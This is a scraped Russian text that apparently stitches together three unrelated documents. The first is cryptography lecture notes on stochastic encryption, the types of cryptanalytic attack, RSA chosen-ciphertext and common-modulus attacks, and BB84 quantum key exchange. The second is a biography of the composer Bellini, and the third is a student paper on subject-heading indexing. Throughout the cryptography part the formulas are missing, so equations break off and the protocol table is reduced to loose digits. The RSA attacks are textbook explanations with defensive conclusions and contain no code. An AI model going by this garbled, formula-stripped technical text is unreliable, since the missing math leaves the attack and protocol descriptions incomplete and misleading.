Сформулируем сущность и основные особенности метода защиты информации, использующего сигнальную конструкцию стохастического кодирования, содержащего операции стохастического преобразования двоичной последовательности длиной , которую можно назвать в терминах теории кодирования -ичным символом (), или, в терминах криптографии, блоком шифрования.
1) Применение двупараметрических преобразований с использованием последовательности гаммы при более сложной, чем в случае гаммирования, операции наложения гаммы .
2) Сочетание преобразования на большой длине блока (блочное шифрование) с использованием последовательности гаммы.
3) Использование последовательности гаммы с очень большим периодом, удовлетворяющей тестам на случайность и требованиям на непредсказуемость.
4) Использование случайных таблиц замены для двупараметрической операции, не имеющей другого формального описания, кроме таблицы.
5) Использование при генерации гаммы регистров с обратной связью при большой длине регистра и нелинейных операций в цепях обратной связи.
6) Принцип преобразования сообщения в квази случайную последовательность с распределением, не зависящим от статистики исходного сообщения.
7) Возможность совмещения задач криптографической защиты и помехоустойчивого кодирования с обнаружением и исправлением ошибок -ичным кодом, каждый символ которого подвергается стохастическому преобразованию на длине (), совпадающей с длиной блочного шифрования.
Стохастическое шифрование представляет собой преобразование исходной информации -ичными символами (блоками) и длиной двоичных символов с участием квазислучайной последовательности длиной (или ), имеющее обратную операцию и обладающее свойствами -ичного симметрического канала, а именно: после дешифрования (обратного стохастического преобразования)
имеет место:
при ,
при ,
для всех от 1 до
где и – канальный (исходный) и преобразованный векторы ошибки, т.е. сумма по модулю 2 между искажаемым и искаженным вектором.
Особенности стохастического шифрования.
1) Использование двупараметрической операции замены.
2) Развитие двух идей Шеннона:
- равновероятность обеспечивает нулевое количество в криптограмме о сообщении (проверяется с помощью тестов Кнута или NIST);
- если длина ключа не менее длины сообщения, то процедура перебора ключа в принципе не может обеспечить получение исходного сообщения. Если длина сообщения бит, то при переборе всех возможных ключей длины в качестве варианта дешифрованного сообщения появляются все возможные сообщений, в том числе осмысленные (высоко-вероятные) фразы конкретного языка, например русского.
Напротив. Если длина начальной установки датчика гаммы менее длины сообщения, то при переборе всех возможных ключей в качестве варианта сообщения не будут появляться все возможные сообщения и на основе анализа симонтики сообщения можно выделить высоковероятное сообщение; этот критерий является критерием отбора исходного сообщения.
10. Криптоанализ
10.1 Существующие методики криптографических атак
Все предназначение криптографии заключается в сохранении открытого текста (или ключа, или того и другого) в тайне от оппонентов. Предполагается, что оппоненты располагают неограниченным доступом к линиям связи между отправителем и получателем.
Криптоанализом называют науку восстановления (дешифрования) открытого текста без доступа к ключу. Успешный криптоанализ позволяет восстановить открытый текст или ключ. Кроме того, криптоанализ позволяет обнаружить слабые места в криптоносителях, что в конце концов приведет к тем же результатам. Раскрытие ключа без привлечения методов криптологии называют компрометацией.
Попытка криптоанализа называется атакой. Фундаментальное допущение криптоанализа состоит в том. Что секретность сообщения всецело зависит от ключа.
Известны четыре основных типа криптоаналитических атак:
1. Атака на основе только шифротекста. Криптоаналитик располагает шифротекстами (криптограммами) нескольких сообщений, зашифрованных. Его задача состоит в дешифровании как можно большего числа сообщении. Еще лучше, если он сумеет определить ключ (ключи), использованный для шифрования сообщений. Это позволит расшифровать другие сообщения, зашифрованные теми же ключами.
Дано:
Определить: либо либо алгоритм восстановления из .
2. Атака на основе открытого текста. Криптоаналитик располагает доступом не только к шифротекстам нескольких сообщений, но и к открытому тексту одного из этих сообщений. Его задача в определении ключа (или ключей), примененного для шифрования сообщений, с целью дешифрования других сообщений, зашифрованных тем же ключом (ключами).
Дано: .
Определить: либо , либо алгоритм восстановления из .
3. Атака на основе подобранного открытого текста. У криптоаналитика есть доступ не только к шифротекстам и открытым текстам нескольких сообщений, но и возможность выбирать открытый текст для шифрования. Это предоставляет больше возможностей, чем вскрытие с использованием открытого текста, так как криптоаналитик может выбирать для шифрования блоки открытого текста, что может предоставить дополнительную информацию о ключе. Его задача состоит в раскрытии ключа (или ключей), применительно для шифрования сообщений, или алгоритма, позволяющего дешифровать все новые сообщения, зашифрованные тем же ключом (или ключами).
Дано: ,
где криптоаналитик может выбирать
Определить: либо , либо алгоритм восстановления из .
4. Атака на основе адаптивно подобранного открытого текста. Криптоаналитик может не только выбирать шифруемый текст, но также уточнять свой последующий выбор на основе полученных ранее результатов шифрования. Так при вскрытии с использованием подобранного открытого текста криптоаналитик может выбирать для шифрования только один крупный блок открытого текста. При адаптивном же вскрытии с использованием подобранного открытого текста он может выбирать следующий блок, используя результаты первого выбора и т.д.
Кроме перечисленных типов известны так же, по крайней мере, еще три типа криптоаналитических атак.
1) Атака на основе подобранного шифротекста. Криптоаналитик может выбирать различные шифротексты для расшифрования. А так же имеет доступ к расшифрованным открытым текстам. Например, у криптоаналитика есть доступ к «черному ящику», выполняющему автоматическое расшифровывание. Его задача состоит в раскрытии ключа.
Дано: .
Получить: .
Такой тип вскрытия применим, главным образом, к алгоритмам с открытым ключом. Кроме того, вскрытие с использованием подобранного шифротекста в некоторых случаях эффективно против симметрических алгоритмов.
2) Атака на основе подобранного ключа. Такой тип вскрытия не означает, что криптоаналитик может выбирать ключ – просто он кое-что знает о связях между различными ключами.
3) Бандитский криптоанализ. До получения ключа «криптоаналитик» прибегает к угрозам, шантажу или пыткам. Возможно также взяточничество, которое иногда называют «вскрытием с покупкой ключа». Это очень мощные и, зачастую, самые эффективные методы взлома алгоритма.
Подробнее мы рассмотрим атаку на основе подобранного шифротекста, т.к. в настоящее время во всем мире используется кодирование с открытым ключом.
10.2 Взлом шифров с открытым ключом на основе подобранного шифротекста
СЦЕНАРИЙ №1. Еве, подслушивающей линии связи Алисы, удалось перехватить сообщение , зашифрованное с помощью RSA открытым ключом Алисы. Ева хочет прочитать сообщение , т.е. необходимо узнать .
(11.1)
Для вскрытия она сначала выбирает первое случайное число r, меньшее n и достает открытый ключ Алисы . Затем она вычисляет:
(11.2)
Если , то .
Далее Ева просит подписать Алису y её закрытым ключом, тем самым расшифровав y. (Алиса должна подписать сообщение, а не его хесл-значение). Алиса никогда раньше не видела y. Алиса посылает Еве:
(11.3)
После этого Ева вычисляет:
(11.4)
Ева получает .
СЦЕНАРИЙ №2. Трент – компьютер-нотариус. Если Алиса хочет заверить документ, она посылает Тренту. Трент подписывает его цифровой подписью RSA и отправляет обратно. (Однонаправленные хеш-функции не используются, Трент шифрует своим закрытым ключом все сообщение). Ева хочет, чтобы Трент подписал такое сообщение, которое в обычном случае он никогда не подпишет. Это сообщение может содержать фальшивую временную метку, или же автором этого сообщения может являться другое лицо. Какой бы не была причина, Трент никогда не подпишет это сообщение, если у него будет возможность выбора. Назовем это сообщение . Сначала Ева выбирает произвольное значение x и вычисляет:
(11.5)
Значение – это открытый ключ Трента, который должен быть опубликован. Далее Ева вычисляет
(11.6)
и посылает Тренту на подпись. Трент возвращает . Теперь Ева вычисляет значение
(11.7)
которое и является подписью
СЦЕНАРИЙ №3. Ева хочет, чтобы Алиса подписала сообщение . Она создает два сообщения ,, такие, что:
(11.8)
Если Ева сможет заставить Алису подписать и , она сможет вычислить подпись для :
(11.9)
Вывод: Никогда не используйте алгоритм RSA для подписи случайных документов, подсунутых вас посторонними. Вначале всегда следует воспользоваться однонаправленной хеш-функцией. Формат блоков, предлагаемый ISO 9796, предотвращает описанное вскрытие.
10.3 Взлом шифров с открытым ключом при использовании общего модуля
Возможна реализация RSA, в которой всем пользователям раздается одинаковый модуль , но каждому передается отдельное значение степени и . Наиболее очевидная проблема такого подхода заключается в том, что тогда текст может быть раскрыт даже при отсутствии каких-либо сведений об одном из ключей шифрования. Рассмотрим эту проблему подробнее.
Пусть одно и то же сообщение когда-нибудь шифровалось разными показателями (с одним и тем же модулем), и эти два показателя – взаимно простые числа. Пусть – открытый текст сообщения, и – два ключа шифрования, а – общий модуль. Шифротекстами сообщения являются:
()
Криптоаналитик знает . Сообщение он находит по следующему алгоритму.
Так как и – взаимно простые числа, то с помощью расширенного алгоритма Евклида можно найти и , для которых
()
Считая отрицательным (здесь или , или должны быть отрицательными, положим, что отрицательным будет ), воспользуемся расшифрованным алгоритмом Евклида для вычисления .Затем
()
Из всего выше сказанного следует вывод, что нельзя делать общим для группы пользователей.
10.4 Методы повышения стойкости RSA
Знание одной пары секретного/открытого показателей для данного модуля позволяет взломщику разложить модуль на множители.
Знание одной пары секретного/открытого показателей для данного модуля позволяет взломщику вычислить другие пары показателей, не разлагая модуль на множители.
В протоколах сетей связи, применяющих RSA не должен использоваться общий модуль.
Для предотвращения вскрытия малого открытого показателя все сообщения должны быть дополнены случайными значениями.
Секретный показатель должен быть большим числом.
12. Квантовая криптография
Впервые идея шифрования с использованием квантового канала сформулирована в 1970 г. С.Уиснером и развита в 80-е г.г. Ч.Беннетом, Ж.Брассаром и С.Брейдбардом.
Для пересылки последовательности двоичных битов в квантовом канале связи используются специальным образом поляризованные фотоны. Фотон - элементарная квантовая система, которая характеризуется определенным направлением поляризации (рис.12.1)
Рис.12.1. Поляризация фотона.
Здесь r – единичный вектор, указывающий поляризацию фотона и направленный под углом ; где – проекции; f – направление поляризации фильтра-анализатора. Из законов квантовой механики следует, что при попадании в такой фильтр-анализатор с параметром фотон ведет себя «дихоматическим и совершенно непредсказуемым образом», проходя через фильтр без изменения с вероятностью и поглощаясь в нем с дополнительной вероятностью . Это квантово-механическое явление проявляется и на макроуровне для интенсивности пучка поляризованного света при прохождении через фильтр в виде закона Малюса, согласно которому интенсивность световой волны, прошедшей анализатор, пропорциональна квадрату косинуса угла между плотностью поляризации световой волны и плотностью пропускания анализатора. Отметим, что если разность угла поляризации и угла пропускания фильтра-анализатора принимает значение
то и фотон проходит фильтр или поглощается им с одной и той же вероятностью . Этот факт и используется при выборе осей поляризации для квантового шифрования.
Принято говорить, что имеет место диагональная поляризация фотона, если вектор его поляризации:
или ,
то говорят о диагоналях поляризации и обозначают её символом “x”.
Проиллюстрируем применение квантовых сигналов в криптографии на примере передачи секретного ключа по открытому квантовому каналу. Рассмотрим классическую схему криптографической передачи информации. Алиса, желающая передать Бобу секретный ключ, который в дальнейшем будет использоваться, например, для обмена информацией с помощью некоторой криптосистемы. Ева – криптоаналитик, которая хотела бы скрытно завладеть копией передаваемого ключа.
Алиса гарантирует случайную секретную двоичную ключевую последовательность длиной N:
и случайную секретную индексную последовательность той же длины:
Затем Алиса генерирует в квантовый канал связи последовательность N фотонов: i – му фотону Fi, несущему сигнал Ki, дается поляризация “+” (если Ji=0) и поляризация “x” (если Ji=1).
Боб, имея два приемника фотонов (с поляризациями “+” и “x”), принимает поток фотонов. Если бы он знал индексную последовательность J, то, переключая приемники, добился бы того, что то есть что последовательность фотонов была бы воспринята безошибочно, и, следовательно, получен ключ K. Так как Боб не знает J, он использует свою индексную последовательностьJ’ VN. Очевидно, что в среднем совпадает N/2 символов у J и J’. Следовательно, лишь половина (в среднем) фотонов будет зарегистрирована безошибочно, а остальные фотоны не несут никакой информации о K:
,
Если Ева извлечет некоторые фотоны из последовательности измерения своими приемниками, то Боб сразу же обнаружит потерю фотонов.
Следующие шаги протокола выполняются в обычном канале связи. Прежде всего, через этот канал Алиса определяет посредством открытого обмена сообщениями, какие фотоны зарегистрированы и какие из них соответствуют истинной поляризации . Если Ева не нарушает квантовой передачи, то биты , значения которых не обсуждались по открытому каналу, становятся общим секретным ключом для Алисы и Боба:
.
Из-за возможных действий Евы (в том числе связанных со “вставкой ” фотонов) Алиса и Боб должны убедиться, что их получившиеся битовые строки идентичны. Простое решение состоит в том, чтобы Алиса и Боб открыто сравнили некоторые из битов , относительно которых, как они думают, необходимо прийти к соглашению. Позиции этих “открыто сверяемых” битов должны быть выбраны после того, как квантовая передача завершена, чтобы лишить Еву информации о том, какие фотоны она может измерять без опаски. Оставшиеся битов могут использоваться в качестве секретного ключа для последующей связи по открытому каналу с помощью одного из симметрических криптоалгоритмов. В таблице 13.1 приведен протокол выработки секретного ключа с помощью квантового канала связи при состоящий из следующих шагов:
1. Передача по квантовому каналу:
а) случайная бытовая строка посылаемая Алисой;
б) последовательность поляризаций, задаваемая ;
в) посланная Алисой последовательность фотонов;
г) последовательность поляризаций , использованная Бобом;
д) битовая строка, зарегистрированная Бобом;
2. Обсуждение по открытому каналу:
а) Боб сообщает поляризацию зарегистрированных фотонов;
б) Алиса отмечает, какие поляризации были угаданы правильно;
в) последовательность секретных битов, которую можно использовать в качестве секретного ключа (если не было нарушения квантовой передачи);
г) Боб указывает номера “открыто сверяемых” битов ключа;
3. Результат: оставшиеся секретных битов.
Шаг
Информация
1
0
1
1
0
1
1
0
0
1
0
1
1
0
0
1
2
х
+
х
+
+
+
+
+
х
х
+
+
+
+
+
3
4
+
х
х
+
+
х
х
+
х
+
х
х
х
х
+
5
1
1
1
0
0
0
1
1
1
0
1
6
+
х
+
х
х
+
+
х
х
х
+
7
V
V
V
V
V
V
8
1
1
0
1
0
1
9
1
0
10
V
V
11
1
0
1
1
Табл. 13.1 Протокол выработки секретного ключа с помощью квантового канала связи.
Если же или ,
То говорят о прямоугольной поляризации и обозначают ее символом “+”.
22 |
https://doc4web.ru/istoriya/bellini-vinchenco.html | Беллини, Винченцо | https://doc4web.ru/uploads/files/184/b8596118ac58de967d66c02ae28057c1.docx | files/b8596118ac58de967d66c02ae28057c1.docx | План
Введение
1 Биография
2 Оперы
Список литературы
Введение
Винченцо Сальваторе Кармело Франческо Беллини (итал. Vincenzo Salvatore Carmelo Francesco Bellini; 3 ноября 1801(18011103), Катания, Сицилия — 23 сентября 1835, Пюто, близ Парижа) — итальянский композитор.
1. Биография
Происходил из семьи музыкантов (отец — дирижёр, дед — органист и композитор). Учился в Неаполитанской консерватории. Написал 11 опер, из которых большим успехом пользовались «Капулетти и Монтекки» (1830, театр «Фениче», Венеция), «Сомнамбула» (1831, театр «Каркано», Милан), «Пуритане» (1835, «Театр Итальен», Париж). Наиболее значительное произведение — опера «Норма» (1831, театр «Ла Скала», Милан). Постановки опер Беллини часто сопровождались патриотическими демонстрациями: в условиях роста национально-освободительного движения в Италии зрители находили в его операх актуальное политическое содержание. Беллини — крупнейший мастер итальянского стиля бельканто. Основу его музыки составляет яркая вокальная мелодика, гибкая, пластичная, отличающаяся непрерывностью развития. На произведениях Беллини совершенствовали своё искусство выдающиеся итальянские певцы.
23 сентября 1835 года в предместье Парижа Беллини скончался от острого воспаления кишечника, осложнённого абсцессом печени. Прах композитора покоится на Сицилии, в кафедральном соборе города Катании.
2. Оперы
«Адельсон и Сальвини» («Adelson e Salvini»), 1825
«Бьянка и Джернандо» («Bianca e Gernando»), 1826. Под названием «Бьянка и Фернандо» («Bianca e Fernando») 1828
«Пират» («Il pirata»), 1827
«Чужестранка» («La straniera»), 1829
«Заира» («Zaira»), 1829
«Эрнани» (не окончена), 1830
«Капулетти и Монтекки» («I Capuleti e i Montecchi»), 1830
«Сомнамбула» («La sonnambula»), 1831
«Норма» («Norma»), 1831
«Беатриче ди Тенда» («Beatrice di Tenda»), 1833
«Пуритане» («I puritani»), 1835
Примечания
Литература
Серов А., Беллини, его деятельность и значение, «Пантеон», 1854, вып. 5;
Конен В., История зарубежной музыки, 2 изд., в. 3, М., 1965, с. 372-75;
Pougin A., Bellini, sa vie et sesoeuvres, P., 1868;
Pizzetti I., Vincenzo Bellini, 2 ed., Mil., 1936.
Пастура Ф. Беллини. М., 1989.
Источник: http://ru.wikipedia.org/wiki/Беллини,_Винченцо |
https://doc4web.ru/informatika/yazik-predmetnih-rubrik-sostav-i-oblasti-primeneniya.html | Язык предметных рубрик: состав и области применения | https://doc4web.ru/uploads/files/211/050bb9012ffda960639aef1de3764293.docx | files/050bb9012ffda960639aef1de3764293.docx | 2
МИНИСТЕРСТВО ОБРАЗОВАНИЯ И НАУКИ РОССИЙСКОЙ ФЕДЕРАЦИИ
Нижнетагильская государственная социально-педагогическая академия
Исторический факультет
Контрольная работа
Язык предметных рубрик: состав и области применения
Исполнитель:
студентка группы 311 Д СГИ ОЗО
Шешукова М.Д.
Руководитель:
зав. кафедрой прикладной
информатики, к. п. н., доцент
Гуторова Л.Е.
г. Нижний Тагил 2008
Содержание
Введение
1. Понятие информационно-поискового языка
2. Формирование предметной рубрики
2.1 Структура предметной рубрики
2.2 Правила составления предметной рубрики
3. Область применения
Заключение
Список литературы
Введение
Сегодня, в век информатизации и компьютеризации информация является таким же ресурсом, как трудовые, материальные и энергетические. Информация - это разъяснение, осведомленность, изложение. Информация - ценнейший ресурс наряду с такими традиционными видами ресурсов, как нефть, газ, полезные ископаемые и другие.
Переход к информационному обществу XXI века породил беспрецедентный рост объемов и концентрации информации в глобальных компьютерных сетях. Это резко обострило проблему создания информационно-поисковых систем (ИПС) и их эффективного использования.
Информационно-поисковая система (ИПС) - это упорядоченная совокупность документов (массивов документов) и информационных технологий, предназначенных для хранения и поиска информации - текстов (документов) или данных (фактов) . Информационно-поисквыми системами являются любые определенным образом организованные хранилища информации. Причем информационно-поисковые системы могут быть и неавтоматизированными. Главное - это целевая функция: хранение и поиск информации.
Важнейшим компонентом информационно-поисковых систем является информационно-поисковый язык. Информационно-поисковый язык - знаковая система, предназначенная для описания (путем индексирования) основного смыслового содержания текстов (документов) или их частей, а также для выражения смыслового содержания информационных запросов с целью реализации информационного поиска.
Человек, чтобы отобрать из массива документов нужные, должен прочитать или просмотреть их содержимое. Для ускорения и упрощения этой процедуры появились различные формы сокращенной записи содержания документов - аннотации, рефераты, каталоги. Но во всех этих случаях при отборе документов по их сокращенным описаниям используется естественный язык. Хорошо известны такие "недостатки" языковых знаков, как омонимия, синонимия, многозначность. Точное значение многих слов можно понять только в контексте. Это препятствует использованию естественного языка для фиксации и отождествления понятийной информации. Поэтому формальные системы, предназначенные для хранения документальной информации с целью последующего поиска, потребовали создания специальных информационных языков. Информационно-поисковые языки представляют собой знаковые системы со своим алфавитом, лексикой, грамматикой и правилами пользования. Все искусственные языки, так или иначе, создавались и создаются на основе естественных языков. История автоматизированных информационно-поисковых систем исчисляется полувеком. Типичная ИПС первых лет - это человеко-машинная система, где анализ и описание содержания документов (индексирование) выполняется вручную, а поиски проводятся машиной. Первоначально основу ИПС составляли информационно-поисковые языки (ИПЯ), основным элементом которых являются дескрипторные словари и тезаурусы. Сегодня, однако, большинство работающих ИПС относится к классу вербальных систем бестезаурусного типа, когда индексационные термины выбираются непосредственно из текстов документов. Актуальность данной работы объясняется тем, что лавинообразный рост объемов электронной документальной информации, ее видовое, тематическое и языковое разнообразие являются как причиной кризиса современного информационного поиска, так и стимулом его совершенствования.
Целью данной работы является знакомство и понятие языка предметных рубрик.
1. Понятие информационно-поискового языка
Как было указано выше информационно-поисковый язык (ИПЯ) - это знаковая система, предназначенная для описания (путем индексирования) основного смыслового содержания текстов (документов) или их частей, а также для выражения смыслового содержания информационных запросов с целью реализации информационного поиска. Существует множество типов ИПЯ. Наиболее часто в качестве основания деления при классификации ИПЯ используют способ организации понятий. По способу организации понятий различают: предкоординируемые (классификационные) ИПЯ, посткоординируемые (дескрипторные) ИПЯ. В свою очередь они делятся на различные типы. К числу таких ИПЯ принадлежит и язык предметных рубрик.
Язык предметных рубрик - это информационно-поисковый язык, предназначенный для индексации (частей) документов и информационных запросов посредством предметных рубрик.
Предметная рубрика - элемент ИПЯ, представляющий собой краткую формулировку темы на естественном языке.
Совокупность предметных рубрик и связанного с ними ссылочно-справочного аппарата предметного каталога или указателя образуют словарь предметных рубрик. При создании словаря предметных рубрик в него вводятся все синонимы и эквивалентные по смыслу выражения, возможные в естественном языке. Но для предметизации используется лишь один из смысловых вариантов - остальные исключаются с помощью отсылок, обозначаемых пометкой “см. запись”. Например, “аэропланы см. самолеты” - эта запись означает, что из двух возможных слов для предметизации разрешается использовать только термин “самолеты”. При разыскании синонимов могут помочь словари синонимов, толковые словари, терминологические и энциклопедические словари. Помимо лексических синонимов и эквивалентных по смыслу выражений можно отметить еще несколько видов синонимии, которую необходимо учитывать в языке предметных рубрик:
сокращенная и полная форма термина, выраженного словосочетанием. Например, “пластмассы" и “пластматические массы". В большинстве случаев используется полная форма термина
инверсированная и прямая форма лексической единицы. Например, “поршневые насосы” и “насосы поршневые”
возможные варианты написания имен и фамилий. Например: “Гашек Я. и Хашек Я."
наличие псевдонима. Например: “Горький М. - Пешков А.М."
Во всех перечисленных случаях необходимо сделать отсылку от отвергнутой формулировки к термину, используемому для предметизации литературы. Омонимичные слова разделяются в своих значениях и вводятся в язык предметных рубрик столько раз, сколько значений имеет омонимичное слово. Явления омонимии и полисемии слов (неоднозначность выражений) в языке предметных рубрик устраняются различными средствами:
1. Терминологическом совпадении наименований объектов содержание, собираемое в рубрике материалов уточняется путем пометок в скобках: “Колумбия (округ) ” и “Колумбия (республика) ”. В тех случаях, когда это возможно, омонимия устраняется с помощью указания отрасли: “Миксеры (радиотехника) ”, “Миксеры (бытовая) ”, “Миксеры (металлургические) ”. Точно также с помощью пометок разделяются значения многозначных слов “Информация (процесс) ”, “Информация (сведения) ", “Информация (философия) ”
2. К одному из значений многозначного слова подбирается термин-синоним, который с помощью отсылки вводится в качестве индексационного термина взамен отвергнутого. Например, “Библиография (наука) см. Библиографоведение”. При использовании отсылки каждое из значений термина может иногда не уточняться пометками. Например, “каталог см.1. библиотечный каталог;
2. промышленные каталоги” Отсылки могут быть сделаны и при помощи развернутой справки. Например, в списке предметных рубрик ИНИОН - “Здесь собирается литература об... Литература о... см. В рубрике”
3. Дается краткое определение понятия, выраженного заголовком предметной рубрики: “БЕРЕЗКА, хореографический ансамбль", “ДЖАВА, курорт”
4. Для развернутой формулировки лексической единицы используется словосочетания. Например, “мерительные пробки”, “пластическая масса”
5. К заголовку рубрики присоединяются подрубрики, которые уточняют контекст термина. Например, термин “клетка" требует уточнения, так как это может быть клетка для зверей, биологическая клетка и т.д. Присоединения подрубрик “деление” или “одеревенено” (“клетка - одеревенения”) делает термин заголовка однозначным. Если многозначное слово находится в подрубрике, то контекст всей рубрики определяет, какое оно имеет значение. Например, “труболинейное производство - центробежный способ - применение миксеров". В данном случае слово “миксер" не требует уточняющей пометки (металлург).
Лексическая единица - смысловое единство (простое и сложное понятия), выраженное одним словом или сочетанием слов, ни одно из которых не может быть отброшено без изменения смысла этого единства. Множество лексических единиц, включенное в словарь, называется словарным фондом или лексикой ИПЯ. В языке предметных рубрик лексические единицы называются заголовками. Следовательно, лексика языка предметных рубрик делится на две части: а) предметные заголовки (заголовки предметных рубрик); б) подзаголовки (подрубрики).
Предметный заголовок (или заголовок предметной рубрики) включает наименование основного предмета. Им может быть конкретное или абстрактное понятие, как единичное, так и общее.
Конкретное понятие отражает предмет. Например, “Солнце", “РГБ” или классификацию предметов. Например, “Каталоги”, “Библиотеки".
Абстрактное понятие отображает не данный предмет как таковой, а свойства предметов и отношение между предметами. Например, “Вязкость (нефти) ", “Склеивание (бумаги) ".
Подзаголовки отражают тот или иной аспект рассмотрения предмета, выраженного заголовком предметной рубрики. Лексику подзаголовков можно подразделить на следующие виды:
тематические подзаголовки (общие, типовые, специфические);
подзаголовки среды (географической и социальной);
хронологические подзаголовки;
формальные подзаголовки
Тематические подзаголовки отражают части, детали, процессы, свойства, идеологическую характеристику, оценку и другие стороны, аспекты рассмотрения предмета, выраженного заголовком предметной рубрики. Например, “Ядерные реакции - Изотопный эффект".
В лексике тематических подзаголовков различают общие подзаголовки, соответствующие понятиям с широким объемом и использующиеся в терминологии всех областей знаний. Например, “Происхождение", “Методика".
Типовые подзаголовки представляют собой термины, использующиеся в нескольких областях знаний для характеристики однородных групп предметов, выраженных заголовком рубрики. Например, для многих видов материала (древесины, пластмассы и т.д.) будут типовыми следующие подзаголовки: “Вентиляция", “Оборудование", “Анализ”.
Специфические подзаголовки служат для выделения аспектов, характерных только для определенного класса предметов. Например, “Гашение (извести) ”, “Пошив (одежды) ".
Подзаголовки среды (географической и социальной) применяются для дополнительной характеристики предмета в территориальном и географическом аспекте, а также в аспекте социальной среды, влияющей на его развитие. Например, “Музыка - Средняя Азия - История".
Географические подзаголовки отражают географическое положение объекта. Например, “Музеи - Англия".
К подзаголовкам социальной среды можно отнести такие термины, как физические и биологические системы и др.
Хронологические подзаголовки характеризуют время существования предмета или явления (“Городские восстания - Россия, XVII-XIX вв", “Лермонтов Михаил Юрьевич, 1814-1841 - Лирика”) или указывается на какой-то исторический период, рамками которого ограничено рассмотрение предмета или события (Франция -Живопись, XVII-XIX вв)
Формальные подзаголовки характеризуют не предмет, рассматриваемый в документе, а сам документ со стороны его читательского назначения, формы изложения материала, типа и вида издания. Например, “Альбом", “Словарь”, “Справочник", “Энциклопедия", “Таблицы".
Лексика заголовков в сложной предметной рубрике может использоваться в качестве подзаголовков. Например, в рубрике “Корневая система - Дыхание" термин “корневая система" является заголовком. “Береза - корневая система", “Растение - питание - роль корневой системы". Этот термин используется в качестве тематической подрубрики.
2. Формирование предметной рубрики
2.1 Структура предметной рубрики
Предметная рубрика прошла трудный путь эволюции. Сначала функции предметной рубрики выполняли предложения, взятые из текста (прообраз современных аннотированных указателей, передающих текст и стиль автора), затем - заглавие книги в форме существительного или словосочетаний. В XX веке в качестве предметной рубрики стали брать основной предмет книги, где бы он ни был указан.
Предметизация - вид индексирования: определение предметной рубрики документа в соответствии с его содержанием, т.е. итогом процесса предметизации является предметная рубрика.
Предметная рубрика - краткая формулировка предмета (факта, события, аспекта и т.д.), рассматриваемого в документе. Например, нефть, приватизация. В зависимости от лексических единиц в предметной рубрике различают простую и сложную.
Простая предметная рубрика - предметная рубрика, состоящая из одной лексической единицы - из заголовка. Количество слов в заголовке не имеет значения. Например, банки, потребительская кооперация.
Сложная предметная рубрика - предметная рубрика, состоящая из нескольких лексических единиц, т.е. кроме заголовка предметной рубрики она содержит один и более подзаголовков. Например, заголовок: аренда, подзаголовки: в России, в СССР, договор А, жилья.
В зависимости от объема предметные рубрики делятся на адекватные и обобщающие.
Адекватная предметная рубрика - предметная рубрика, формулировка которой выражает объем понятия, наиболее точно соответствующий объему понятий о предмете документа.
Обобщающая предметная рубрика - предметная рубрика, выражающая объем понятия, существенно более широкий, чем объем понятия о предмете документа. Например, на книгу "Производство асфальта" может быть составлена как адекватная (соответствующая) главному предмету книги:
Нефтепродукты
производство
так и обобщающая предметная рубрика:
Асфальт
производство
Подзаголовок - второй и каждый последующий элемент многочленной предметной рубрики, отделяемый от последующих разделительным знаком. Подзаголовок дает аспект (подтему) предмета, выраженного в предметной рубрике. В зависимости от степени общности и границ применения подзаголовки могут быть общими и специальными.
Общие подзаголовки могут применяться для характеристики разнообразных предметов. Эти подзаголовки выражаются словами: История, Происхождение, Исследование, Изучение и т.д.
Специфические подзаголовки выражают аспекты исследования, характерные для отдельного предмета:
система библиотечных каталогов - элементы
национальные меньшинства - защита
Такие подзаголовки могут иметь и самостоятельное значение: защита национальных меньшинств.
В зависимости от содержания различают подзаголовки:
тематические (Бурый уголь - сухая перегонка; Лицеи - воспитательная работа)
географические (Экономика, Тюмень; Финская национальная опера)
хронологические (Французская революция, 1789 - 1799; Архитектура эпохи Возрождения)
формальные (Связи частей СБА, табл.9; Хризантема, рис.5)
2.2 Правила составления предметной рубрики
Чтобы информационно-поисковый язык мог в полной мере осуществить свою поисково-информационную функцию, предметная рубрика, являясь его основным элементом, должна соответствовать определенным требованиям и формулироваться по правилам.
Предметная рубрика должна быть:
1. Грамотной - не содержать научных и политических ошибок
Правильно:
Афганская война (1978 - 1989)
Неправильно:
Афганские события (1978 - 1989)
2. Адекватной - полно и точно передавать информацию. Особое место здесь при составлении предметных рубрик выражается в умении адекватного понимания мыслей и чувств, выраженных автором.
3. Однозначной - не допускать двусмысленных толкований, исключать омонимию и полисемию (многозначность):
Правильно:
Сосуды (мед), Толстой Л.Н. и его семья
Неправильно:
Сосуды, Толстой Л.Н. и семья
4. Комплексирующей - собирать все сведения о предмете
Правильно:
Алфавитно-предметный указатель (АПУ)
в таблицах классификации
ведение
и ПК
и СК
использование для поиска в СК
координирующая функция
оформление
редактирование
Зал каталогов УНБ
Научность СК
Рабочее место систематизатора
Неправильно:
Алфавитно-предметный указатель (АПУ)
в таблицах классификации
ведение
и ПК
и СК
использование для поиска в СК
координирующая функция
Зал каталогов УНБ
Научность СК
Оформление АПУ
Рабочее место систематизатора
Редактирование АПУ
5. Эвристичной - на первом месте в предметной рубрике должно стоять слово, несущее максимальную смысловую нагрузку
Правильно:
Брэдфорда закон
Неграждане - социология
Неправильно:
Закон Брэдфорда
Социология неграждан
Правила формулирования предметных рубрик:
1. В состав предметных рубрик могут входить все части речи, но чаще всего существительные и словосочетания с ними:
Вторая мировая война (1939 - 1945)
Независимость России
Лаос
Личное подсобное хозяйство
Набоков Владимир Владимирович
Реинкарнация
Рентгеновская астрономия
Техника безопасности
Частное языкознание
Экспертиза
Юпитер
Якуты
2. Предметные рубрики и их подзаголовки, как правило, формулируются в именительном падеже:
Расселение народов мира
Умышленное преступление
но применяются и косвенные падежи, чаще всего родительный:
Вавилова - Черенкова эффект
Управление запасами, теория (мат)
3. В формулировках предметных рубрик употребляется как единственное, так и множественное число. Единственное число применяется в тех случаях, когда предмет не имеет множественного числа. Например, пальто. В спорных случаях предпочтение отдается множественному числу.
4. Даты в заголовках и подзаголовках пишутся и арабскими, и римскими цифрами. Даты даются в круглых скобках, буква "г" не ставится, если не указывается месяц и в состав дат не входят века и годы одновременно:
Гоббс, Томас (1588 - 1679)
Николай II (1868 - 1918)
5. Сокращения в предметных рубриках:
названия, имеющие полную и краткую формы отражаются в полной форме. От сокращений дается отсылка:
ОРЗ см. Острые респираторные заболевания
Острые респираторные заболевания 55, 142
Даже от хорошо известных ранее аббревиатур следует давать
отсылки к полному названию.
допускаются некоторые общепринятые сокращения, например ж. - д. (железнодорожный), с. - х. (сельскохозяйственный)
сокращается слово смотри "см. ", когда "делаются ссылки и отсылки"
сокращаются до одной буквы слова в подрубрике, если они повторяют заголовок:
Социальное страхование
правовое регулирование С. с.
В остальных случаях для обеспечения понимания текста сокращать слова не рекомендуется.
